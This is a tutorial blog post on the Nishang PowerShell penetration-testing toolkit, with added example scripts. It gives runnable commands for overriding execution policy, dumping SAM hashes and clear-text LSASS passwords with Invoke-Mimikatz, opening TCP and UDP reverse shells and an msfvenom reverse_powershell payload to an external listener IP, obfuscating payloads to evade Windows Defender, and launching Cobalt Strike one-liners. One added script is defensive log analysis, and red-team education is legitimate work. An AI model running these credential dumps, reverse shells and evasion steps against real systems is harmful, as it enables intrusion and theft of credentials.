Table of Contents
Introduction to Nishang
A wave of password capture
Reverse shells

How to use Nishang, the PowerShell penetration testing tool

May 13, 2023, 10:58 AM

First, the concept. PowerShell is Microsoft's command-line shell and scripting language for Windows. It can be thought of as the successor to cmd.exe and batch scripting, or as the Windows counterpart of the Unix bash shell, but unlike either it is object-oriented and built on the .NET Framework, so a script can call any .NET API directly. It extends what command-line users and script writers could do in the Windows Command Prompt and Windows Script Host with many new concepts: cmdlets, pipelines that pass objects rather than text, and modules.

Why it matters for penetration testing: PowerShell code can be loaded and run entirely in memory, so nothing has to be written to disk, and many environments that block or monitor cmd.exe leave powershell.exe unrestricted. Be aware that this is much less true on current systems. Windows 10 and later ship AMSI, Script Block Logging and Constrained Language Mode, and EDR products hook PowerShell specifically, so "runs in memory" no longer means "invisible". Still, when we have to get past endpoint protection during an engagement, PowerShell tooling is a good alternative to dropping binaries.

Take credential dumping as an example. mimikatz, written by Benjamin Delpy, is the tool everybody reaches for, and its most striking feature is pulling the clear-text passwords of logged-on Windows accounts straight out of lsass.exe. Run the mimikatz executable as-is, however, and any mainstream antivirus suite will quarantine it on sight. Loaded through PowerShell, the same capability can be executed without the binary ever touching the disk. Below are some commonly used tools that take this approach.

Introduction to Nishang

Nishang is a collection of PowerShell scripts and payloads for penetration testing and red teaming. It covers credential gathering, port scanning, privilege escalation, shells, pivoting and more, and it is a common first tool for people getting into penetration testing. Download it from https://github.com/samratashok/nishang (clone the repository with git or download it as a zip). After downloading, the directory listing shows how the scripts are organized by category (Gather, Shells, Escalation, Scan, Pivot, Backdoors and so on).


Below we use a lab environment to demonstrate the modules most commonly used during a penetration test. Before the demonstration we need to clear up a few errors people commonly hit when running PowerShell tooling, such as script execution permission problems and module import failures.

The first time you try to import the module, PowerShell refuses, because the default execution policy on Windows client systems (Restricted) does not allow any script file to run. We need to change the policy to one that does, in this case RemoteSigned, which allows local scripts to run and requires a digital signature only for scripts downloaded from the Internet.


First check the current execution policy (Get-ExecutionPolicy). Restricted means no script may be executed at all, even by an administrator. Change it with:

Set-ExecutionPolicy RemoteSigned

Querying the policy again now shows RemoteSigned, and the module import succeeds; the warning about unsigned content that may appear can be ignored. One caveat: the execution policy is a safety feature against accidentally running scripts, not a security boundary. It can be overridden per process on the command line, which is exactly what the -exec bypass switch in the commands later in this article does.


To list the functions in the imported module, execute: Get-Command -Module nishang


List information about the local machine: Get-Information


With the execution policy changed, let's start the demonstration.
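The setup steps above collected into one script, as an added example that is not part of the original article. It assumes the repository was cloned to C:\nishang and that its module file is C:\nishang\nishang.psm1; adjust the path if you cloned elsewhere.

```powershell
# Added example, not from the original article: execution policy check,
# module import and function listing in one place. Assumes the repository
# was cloned to C:\nishang and that its module file is C:\nishang\nishang.psm1.
$NishangRoot = 'C:\nishang'   # assumption: clone location

# Policy at every scope; the effective one is the first non-Undefined entry
# reading top to bottom. Windows clients default to Restricted.
Get-ExecutionPolicy -List

# RemoteSigned for the current user is enough to run local scripts and needs
# no administrator rights, unlike the LocalMachine scope that a plain
# "Set-ExecutionPolicy RemoteSigned" changes.
if ((Get-ExecutionPolicy -Scope CurrentUser) -in 'Undefined', 'Restricted') {
    Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser -Force
}

# Files downloaded from the Internet carry a Zone.Identifier mark and count as
# "remote" under RemoteSigned; clearing it avoids "not digitally signed" errors
# when the zip was downloaded through a browser.
Get-ChildItem -Path $NishangRoot -Recurse -Include *.ps1, *.psm1 | Unblock-File

Import-Module (Join-Path $NishangRoot 'nishang.psm1') -Force
Get-Command -Module nishang | Sort-Object Name | Select-Object Name, CommandType
```

Setting the policy at CurrentUser scope leaves the machine-wide setting alone, which matters on a shared test box. Remember that none of this protects anything: a process started with an explicit bypass of the policy, or a script piped into Invoke-Expression, runs regardless of what Get-ExecutionPolicy reports.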

A wave of password capture

Once we have a foothold on a server, the first question is whether the target is a physical machine or a virtual machine. Nishang answers that with: Check-VM


Nishang also integrates scripts for credential capture. First the password hashes. Get-PassHashes reads the local SAM, so it has to run in an elevated session. Run in the current PowerShell session, it prints the hashes straight to the console:

Get-PassHashes

The same thing launched from cmd.exe, with the output saved to a file of our choosing:

powershell -exec bypass -Command "& {Import-Module 'C:\nishang\Gather\Get-PassHashes.ps1'; Get-PassHashes -PSObjectFormat | Out-File hash.txt}"


Since we can capture the hashes, we can also capture plaintext passwords. Looking at the script used for this, we can see that it is Mimikatz itself: Invoke-Mimikatz carries the Mimikatz binary as a compressed, base64-encoded blob and reflectively loads it into the PowerShell process, so the tool never exists as a file on disk.


We can use the following command to get the clear-text passwords of the users currently logged on to the system (the most commonly used command in this section):

powershell -exec bypass -Command "& {Import-Module 'C:\nishang\Gather\Invoke-Mimikatz.ps1'; Invoke-Mimikatz}"

With no arguments Invoke-Mimikatz runs sekurlsa::logonpasswords against the local machine. This needs administrator rights, because the script enables SeDebugPrivilege to read LSASS memory. On Windows 8.1 / Server 2012 R2 and later, clear-text passwords only show up if WDigest credential caching is enabled; otherwise you get NTLM hashes and Kerberos material, which is still enough for pass-the-hash.
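Both captures above in one elevated run, plus a small triage of the hash output, as an added example that is not part of the original article or of Nishang. It assumes the repository sits at C:\nishang (the path the article uses), that Get-PassHashes prints pwdump-style lines of the form user:rid:LMhash:NThash::: by default, and that %TEMP%\creds is an acceptable drop location.

```powershell
# Added example, not from the original article or from Nishang itself.
# Runs both credential captures in one elevated session and triages the
# hash output. Assumptions: repository at C:\nishang, Get-PassHashes prints
# pwdump-style "user:rid:LMhash:NThash:::" lines, output goes to %TEMP%\creds.
$NishangRoot = 'C:\nishang'                 # assumption: clone location
$OutDir      = Join-Path $env:TEMP 'creds'   # assumption: drop location
$Stamp       = Get-Date -Format 'yyyyMMdd-HHmmss'

function Test-IsElevated {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    ([Security.Principal.WindowsPrincipal]$id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

# Parses pwdump-style lines and flags the two findings worth acting on first:
# accounts whose NT hash is the hash of the empty password, and accounts that
# share an NT hash (same password reused across local accounts).
function Get-HashTriage {
    param([string[]]$Lines)
    $EmptyNT = '31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of ""
    $entries = foreach ($l in $Lines) {
        if ($l -match '^(?<user>[^:]+):(?<rid>\d+):(?<lm>[0-9a-fA-F]{32}):(?<nt>[0-9a-fA-F]{32}):::') {
            [pscustomobject]@{ User = $Matches.user; RID = [int]$Matches.rid; NT = $Matches.nt.ToLower() }
        }
    }
    $byHash = $entries | Group-Object NT
    foreach ($e in $entries) {
        $others = ($byHash | Where-Object Name -eq $e.NT).Group.User | Where-Object { $_ -ne $e.User }
        [pscustomobject]@{
            User          = $e.User
            RID           = $e.RID
            EmptyPassword = ($e.NT -eq $EmptyNT)
            SharedWith    = ($others -join ',')
        }
    }
}

if (-not (Test-IsElevated)) {
    throw 'Not elevated: SAM and LSASS access will fail. Re-run from an administrator PowerShell.'
}
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# Dot-source so the functions land in this scope (Import-Module on the .ps1 works too).
. (Join-Path $NishangRoot 'Gather\Get-PassHashes.ps1')
. (Join-Path $NishangRoot 'Gather\Invoke-Mimikatz.ps1')

# 1) Local account hashes from the SAM, kept as text lines for the parser above.
$HashLines = Get-PassHashes | Out-String -Stream | Where-Object { $_ -match ':::' }
$HashLines | Set-Content -Path (Join-Path $OutDir "hashes-$Stamp.txt")
Get-HashTriage -Lines $HashLines | Format-Table -AutoSize

# 2) LSASS secrets via the in-memory Mimikatz (default: sekurlsa::logonpasswords).
Invoke-Mimikatz | Out-File -FilePath (Join-Path $OutDir "mimikatz-$Stamp.txt")
Get-ChildItem -Path $OutDir -Filter "*-$Stamp.txt"
```

The elevation check is there because both scripts fail late and confusingly when run as a standard user. Expect Windows Defender on a default Windows 10 or later install to flag Invoke-Mimikatz.ps1 both on disk and through AMSI when it is loaded; the article's own later section on obfuscation exists for that reason.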


Reverse shells


During a penetration test, the usual tunnelling and pivoting tools (nc, lcx, SOCKS proxies and the like) are regularly caught and blocked by the bundled antivirus suites on the target. In that situation the shell scripts in Nishang are an alternative. Note that what is called "port forwarding" here is really a reverse shell: the target initiates an outbound connection to a host we control and hands us a PowerShell prompt over it. Besides Nishang's built-in shells, we also try the equivalent with Metasploit (MSF); both require a listener on a server the target can reach, typically one with a public IP address.

1. TCP reverse shell (reverse connection)

Start the listener on the public server: nc -lvp 5555

The target host executes the port forwarding command: Invoke-PowerShellTcp -Reverse -IPAddress 106.xxx.xxx.115 -Port 5555

After running the two commands on the target host and the public server respectively, a shell from the target appears on the public server, and we can run commands on the internal server through it. The connection is plain TCP with no encryption, so everything typed, credentials included, is visible to any network monitoring between the two hosts.


2. UDP reverse shell (reverse connection)

Start the listener on the public server: nc -lup 6666

The target host executes the port forwarding command: Invoke-PowerShellUdp -Reverse -IPAddress 106.xxx.xxx.115 -Port 6666


Besides reverse connections there are also bind (forward) connections, where the script listens on the target and we connect to it. I mostly use reverse connections on engagements; if you are interested in bind shells, try the bind mode of the same scripts. Now let's do the same thing with PowerShell and MSF. First check whether MSF has a PowerShell payload:

msfvenom -l payloads | grep 'reverse_powershell'

This lists the payloads whose names contain reverse_powershell.


We use MSF to generate the command for the reverse shell:

msfvenom -p cmd/windows/reverse_powershell lhost=106.xxx.xxx.115 lport=9999

This generates a payload of type cmd/windows/reverse_powershell. The output is a one-line PowerShell command, and that line is what has to be executed on the target host (it is the part highlighted in red in the original screenshot).


Next we execute the generated PowerShell command on the target host and listen on port 9999 on the public server; a plain nc listener is enough, since this payload is a raw TCP reverse shell. The target's shell is bounced to the public server.


Next, think about how to get past Windows Defender on the target, because the ordinary payload we just generated is detected and blocked by Defender as soon as it runs. We need to get around that check, so let's take the payload above and obfuscate it. The tool of choice for this is Invoke-Obfuscation by Daniel Bohannon; it is available from the project's GitHub page.

First we start Invoke-Obfuscation:

Import-Module ./Invoke-Obfuscation.psd1    # import the module

Invoke-Obfuscation    # start the interactive tool


Now we obfuscate the reverse-shell payload we just generated. First, look at the available obfuscation options and their parameters:


The part of the payload to obfuscate has to be set first, with the following command, where 'payload' stands for the msfvenom one-liner generated above:

Set scriptblock 'payload'


We choose to obfuscate the entire command as a string (which option to pick depends on the specific engagement environment):


Select 1 for ASCII obfuscation, then enter out 1.ps1 to view the result. This command also saves the obfuscated script as 1.ps1 in the current directory:


Execute this script on the target host while the public server listens on port 9999, and the intranet host's shell comes back successfully:
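Before trusting that the obfuscated payload is invisible, check what a defender sees. Script Block Logging (PowerShell 5 and later, event 4104 in the Microsoft-Windows-PowerShell/Operational log) records each script block as it is executed, that is after the string and encoding wrappers Invoke-Obfuscation added have been unwrapped, so the obfuscation defeats a static scan of 1.ps1 but not this log. The following is an added example, not part of the original article; the search patterns are this example's choice, and it is meant to be run on the target after the test.

```powershell
# Added example, not from the original article: what a defender sees after the
# obfuscated 1.ps1 runs. Event 4104 holds the de-obfuscated script text because
# it is written at execution time, after string/encoding layers are unwrapped.
# The patterns below are this example's choice.
$Patterns = 'reverse_powershell', 'Net.Sockets.TcpClient', 'GetStream', 'Invoke-PowerShellTcp'

$Events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = (Get-Date).AddHours(-1)
} -ErrorAction SilentlyContinue

$Hits = foreach ($e in $Events) {
    # Properties[2] of a 4104 event is ScriptBlockText. A Level of 'Warning'
    # means PowerShell's own suspicious-keyword heuristic fired, which it does
    # even when the Script Block Logging policy has not been enabled.
    $text = if ($e.Properties.Count -ge 3) { [string]$e.Properties[2].Value } else { $e.Message }
    foreach ($p in $Patterns) {
        if ($text -match [regex]::Escape($p)) {
            $flat = $text -replace '\s+', ' '
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Level   = $e.LevelDisplayName
                Pattern = $p
                Snippet = $flat.Substring(0, [Math]::Min(120, $flat.Length))
            }
            break   # one row per event is enough
        }
    }
}
$Hits | Sort-Object Time | Format-Table -AutoSize

# No hits usually means the log is not enabled; this is the policy value that turns it on.
Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue
```

If the de-obfuscated TcpClient and GetStream calls show up here, the obfuscation bought you nothing against a SIEM that collects this log; it only defeated the signature match on the file and the command line. Reading the log needs local administrator rights on the target, which the earlier steps already assumed.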


PowerShell and Cobalt Strike: a different spark

Cobalt Strike is a GUI-based penetration testing framework. It began as a front end to Metasploit and is now a standalone commercial command-and-control platform; it integrates port forwarding, service scanning, exploitation, listeners in several modes, generation of exe and PowerShell payloads, and more. It is also a powerful tool for internal network penetration. Here we only look at what sparks PowerShell and Cobalt Strike can produce together.

Cobalt Strike consists of a team server and a client, which are installed separately; then start the tool:


First create a listener with the public IP address as the host address, then generate a PowerShell one-liner for it and run that command on the target host. The target checks in, after which we can capture passwords, escalate privileges, run monitoring and other post-exploitation tasks remotely:


To be honest, these are only a few of the sparks these two tools produce together; there are many more operations. Interested readers can dig further. These tools are used often in internal network penetration.
